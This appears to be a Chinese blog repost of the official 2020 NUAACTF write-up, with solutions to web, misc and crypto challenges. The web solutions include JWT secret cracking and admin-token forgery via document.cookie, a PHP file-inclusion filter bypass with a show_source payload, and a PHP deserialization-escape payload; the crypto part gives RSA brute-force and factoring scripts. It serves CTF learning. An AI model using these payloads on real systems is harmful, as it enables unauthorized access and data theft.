前言

爷是懒狗,剩下的题懒得复现了,就直接发官方wp
2020NUAACTF官方wp

Web

checkin

题目:签到就完事了 http://139.9.221.0:8086

解题思路:
此题考查curl命令,curl一下直接出flag


jwt

题目:狸猫换太子?嘤嘤嘤 要拿flag,你需要成为admin http://139.9.221.0:8090/

解题思路:
考查jwt
打开网页就是个简陋的登录界面
首先需要jwt爆破得到secret
接着重新组装jwt,然后替换原来的

git clone https://github.com/brendan-rius/c-jwt-cracker
cd c-jwt-cracker
ls
make
./jwtcrack eyJhbGcioiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ilx1MWQyY1x1MMQzMFX1MWMQz0Vx1MWQzNVx1MWQzYSJ9.f_4pXKIaMsBdYkh1aNBowAT_qIGRsjQtzcvvkcycokE

注册登录,找到其cookie


在线工具

输入所得到的的secret和jwt,然后改用户名为admin

最后修改cookie

document.cookie="JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.SYQ-AGwY5XIcxY621ToK8zEgomHE0Bla9tAUWTLxnwA"

刷新即可得到flag

easypop

题目:http://139.9.221.0:8088/

解题思路:
代码审计

运行PHP代码,得到payload

有个d的参数可以传参,于是加上?d=payload,得到最终的flag

command

题目:http://139.9.221.0:8092/

解题思路:
文件包含,伪协议读取文件内容,过滤了flag,也过滤了data没法直接读,看到createfun.php,再得到其源码,readfile去读flag.php

url出现?file=index

文件读取
解码后:

 <?php  error_reporting(0);
    @$file = $_GET["file"];
    if(isset($file)) {      if(preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
            echo "<p> error! </p>";
        } 
        else {
            include($file.'.php');
            setcookie("tips","createfun.php");
        }
    } 
    else {
        header('Location:include.php?file=index');
    }
    ?>

提示createfun.php,再读一次

<?php
$func = @$_GET['func'];
$arg = @$_GET['arg'];
if(isset($func)&&isset($arg))    {$func($arg,'');}
readfile("flag.php","");

payload: createfun.php?func=show_source&arg=flag.php
最后得到flag

web5(安恒四月赛原题)

题目:http://139.9.221.0:8094/

解题思路:
pop链 + 反序列化长度逃逸

    <?php
    function filter_nohack($data) {
        return str_replace('flag', '', $data);
    }
    class C{
        public $c = "flflagag.php";
    }
    class B{
        public $b;
        function __construct(){
            $this->b = new C();
        }
    }
    // O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}
    class A{
        public $username = 'flagflagflagflagflagflag';
        public $password = '1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}';
    }
    // echo serialize(new B());
    echo filter_nohack(serialize(new A()));
    ?>

Misc

假笑男孩

题目:当你看到他的假笑,你就看到了flag
外加一个附件(提取码:ivqg)

解题思路:
打开附件图片很明显图片应该是被改了高度,于是winhex改下高度(把7C->CE)便得到了flag

wireshark

题目:流量分析听过么
外加附件(提取码:g99i)

解题思路:
过滤http
第一个右键追踪http流

babyhttp

题目:你知道什么是 HTTP 吗?(你通过一般方式是打不开网站的) Hint: The newest. 106.14.153.173 8443

解题思路:

babysdn

题目:网络领域有个很火的研究领域叫做SDN,那么你知道SDN可以做什么吗?
外加附件(提取码:4tqs)

解题思路:

Crypto

贝斯

题目:ZmxhZ3t0aGlzX2lzX3JlYWlseV9jaGVjazFufQ==

解题思路:
base64直接得到flag

BruTE_RSA

题目:RSA!!!!RSA!!!!BRUTE TO GET ANSWET!!!!!!!!!!!
外加附件(提取码:s2wj)

解题思路:
脚本一把梭哈

附上脚本:

from Crypto.Util.number import *
    e,n=(65537, 28150970547901913019901824364390497053600856369839321617996700606130553862041378369018779003752433356889118526332329074054728613209407037089320809898343953157935211086135010436283805891893636870991411236307901650696221491790470635225076251966300189483160148297407974155121570252648252906976186499329924342873)
    enc = [14765505659704388743616301253113404978973036615434543467291787063794853415443968447959471191502871327842007582193254954935225085964793898246044520718579206673198788548223402073410975385387693589482235535922205342040654898190651699673461841349817879859547738827158993445539388974095437440553515593043557648807, 2710029303357232932696197225263692040597986927359269224740812600224998707144266259851604978553286889767425982708691908438984279442981540971935737617354609856642312100797081348174935195638083002333058089328102430432526612805955273581245352312630845237670744276402867230550537275379675828467791243032108754996, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 15645290594995180815865397749136800126080704684884296404807344870555186823350216705796063922278419585484662234210001661578549560411864952462380096494781766394542247609648743673312823946783517115542404474786395934886667795692210287283039316418126796934535150832709500306153601987121172178183970841498331059732, 21617442555922665335003358556294294909187675782115332690799733331050423993084437815407074404916831963972996250287968498545085187385399453596033041024572405343861256748315571881946459758027781418048747455833279362845979940372523947345690345032301120487629036754902398646347412656580163307412681787740326750664, 19348488683349923919342516509447021301746908048804474589065296857691964147685313468743094214731368033049009363513595472264453418344479015479950114621314151879917864993370204552541811013392195313132212094385213307392785310155965672154730876755558332642480036174252524027472919787968385243506253357608920063714, 20629854768856798537062426042570334097651328955665698429979954410631113160492201197690192324881508105172595216229624523572595589920695165876501026993810936392510720968159305964832449680889041278532807173859579419197780294984519222830572413180237776797800176462492384318120546495539728732366110782215071262307, 4495435878782180842982598979426848915852309873951905660784792756061068459745710732551595437224048091881417293289266990062187024491087558766616793894302825089791068743147292750307839875294040412901324620528855104301423793144510274139088687721663452221761938305437162345452537045550568167370305116690051809783, 7661724340183101803591438713865416768017391036182721504091980175077745408041746171218955895291610457305692166626410041038406057265635459620914206831469173220106400383322269228580211741720875953586267934600483199784699180072179352772979897002989476042210549203971233854410479608166774751479330366431269265143, 24345863558959407738249127568820138362115734211146549194534219311913032290216606859385934708675962835857804566049600710875035366973110422262131331932310524891713319358676673958738776644229757625523955354996402750265022578843637525183704187498194489645838490640529841182709661371499013082259193633000753627261, 11113777356910731413424023299582648618258376222028450254478672148119889617557563576704932635131420845868165014982665717620845578039880527701593963719893467068820107811384041511295664833904504511210342105242330522375476482706044695838957591685781703894244561607764476555630573446589408768780659378128082633769, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 278354276293884030290100330445865286604723740111170856624965259573282278044823323212960304154629174664076141280100412502135750130875356944835909175355370317285768658282746817782130476757714384697086179400629156643250500432197002583758692394681401772203578628635926749457621478296182304772136118691761841359, 26776010333646450951505049676798517095081501649769062476875716987657158152377399163942730185158271646633743195869088200844528079059295287584662315673931850954417499218402302988583172752092835706460505394013520642399572786659316981175560215257281870309157885279753459530446588724712091187670587598328257057843, 6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 5097867843777034076271397095201528351784693372027998615436445410912131141882225577577253530396333413579756394884096318434100382509189974240357351425474190558456256750742731090012822064840481143528081027106843123030275420215136304130321013605031261372665636366377162666476737296028608455229357416005773064242, 6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 23267174349531278768420819619439317179083929128083924515569762521057285892931325108327037262091624670335579302436476096123152288550738706103166820604983405317430467198343871458522070337902643863890959573514405066297449924638838605501211486861582957963752388608487593217237563529201436917108304692859773404548]
    flag = ''
    for i in enc:
      for j in range(255):
        if pow(bytes_to_long(chr(j)),e,n) == i:
            flag += chr(j)
    print (flag)

FFRREEQQ_RSA

题目:听说话多的人守不住秘密? 注意:本题的答案不会有直接形如 flag{i_am_flag} 这样的答案,但是你会看到类似的内容 FLAG IS I AM FLAG 只需要提交 flag{I_AM_FLAG} 即可
外加附件(提取码:0z7a)

解题思路:
打开output.txt,可以发现被加密的字符内容特别长,其实也就说明了这段内容其实可以用词频分析来猜测每一个加密字符到底是啥
这里注意一点,这里由于没有限制加密的一定是英文这里出现频率最高的其实是空格。通过脚本的方式将密文内容替换成比较简单的字符形式(RSA能够保证每个ascii字符加密得到的密文是不重复的),然后就能够通过分析字符出现频率来分析密文啦。
点我

DONBT STARVE IS A MARVELOUS SURVIVAL GAMEZTHE GAME OPENS WITH MAXWELL SNIDELY COMMENTING ON THE PLAYERBS GAUNT APPEARANCE AND INCLUDES LITTLE FURTHER STORYZTHE GAMEBS SETUP IS TOLD FURTHER THROUGH ITS TRAILERJ ON A DARK AND STORMY NIGHT[ WILSON APPEARS TO E GETTING NOWHERE IN A CHEMISTRY EXPERIMENT UNTIL HE IS STARTLED Y HIS RADIO SPEAKING TO HIMZ IT REVEALS THAT IT HAS NOTICED HIS TROULE AND HAS SECRET KNOWLEDGE OF HIMZ WHEN HE EAGERLY AGREES[ A FLURRY OF E]UATIONS AND DIAGRAMS ENCIRCLE HIM AND FILL HIS HEADZ USING WHITE RATS[ A TYPEWRITER[ AND HIS LOOD AMONG OTHER TOOLS AND MATERIALS[ WILSON CREATES A GIANT MACHINEZ THE RADIO COMMENDS HIS WORK AND TELLS HIM TO PULL THE MACHINEBS SWITCHZ HE HESITATES[ UT AT THE RADIOBS INSISTENCE[ HE DOES SOZ THE MACHINE RATTLES VIOLENTLY[ AND A PAIR OF GHOSTLY ARMS WHISK HIM INTO A DIFFERENT WORLD WHILE AN APPARITION OF MAXWELL CACKLESZTHE FLAG IS THIS IS ALSO FAKE RSA

最后看到FLAG IS THIS IS ALSO FAKE RSA
得到flag:flag{THIS_IS_ALSO_FAKE_RSA}

RREAL_RSA

题目:I AM RSA
外加附件(提取码:ifs4)

解题思路:
用yafu算出p,q,脚本一把梭哈

附上脚本:

    from Crypto.Util.number import *
    from gmpy2 import *
    n = 1106081963347301781444155926534938643298217639670251381867474826890728970307
    p = 167622749606696848477732277529837832463
    q = 6598638704725743849027686163703739789
    e = 65537
    c = 681873475888907291485502809441689140305197371659486141705279050132490452420
    d = invert(e,(p-1)*(q-1))
    m = pow(c,d,n)
    print long_to_bytes(m)

Certificate Authority

题目:圆锥曲线?双曲线?还是椭圆曲线?不过首先得从证书里面找点线索呀
外加附件(提取码:siud)

解题思路:
考查加密算法:Menezes-Vanstone cryptosystem